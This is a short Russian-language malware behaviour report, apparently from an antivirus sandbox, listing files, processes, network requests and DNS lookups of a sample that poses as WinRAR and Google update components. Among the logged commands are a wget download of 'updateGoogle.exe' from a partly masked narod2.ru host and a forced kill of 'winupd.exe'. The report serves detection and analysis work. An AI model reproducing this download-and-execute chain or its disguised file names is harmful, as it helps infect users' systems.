Техническая информация
- %PROGRAM_FILES%\Company\Winrar\updateGoogle.exe
- %PROGRAM_FILES%\Company\Winrar\wget.exe http://st######66666666.narod2.ru/updateGoogle.exe
- %PROGRAM_FILES%\Company\Winrar\updateGoogle.exe (загружен из сети Интернет)
- <SYSTEM32>\ping.exe ya.ru -n 5
- <SYSTEM32>\taskkill.exe /f /im winupd.exe
- <SYSTEM32>\wscript.exe "%PROGRAM_FILES%\Company\Winrar\stop.js"
- <SYSTEM32>\cmd.exe /c ""%PROGRAM_FILES%\Company\Winrar\winupd.bat" "
- %PROGRAM_FILES%\Company\Winrar\wget.exe
- %PROGRAM_FILES%\Company\Winrar\winupd.bat
- %PROGRAM_FILES%\Company\Winrar\updateGoogle.exe
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %PROGRAM_FILES%\Company\Winrar\stop.js
- %TEMP%\$inst\2.tmp
- %PROGRAM_FILES%\Company\Winrar\wget.exe
- %TEMP%\$inst\temp_0.tmp
- %PROGRAM_FILES%\Company\Winrar\stop.js
- 'st######66666666.narod2.ru':80
- st######66666666.narod2.ru/updateGoogle.exe
- DNS ASK st######66666666.narod2.ru
- DNS ASK ya.ru
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''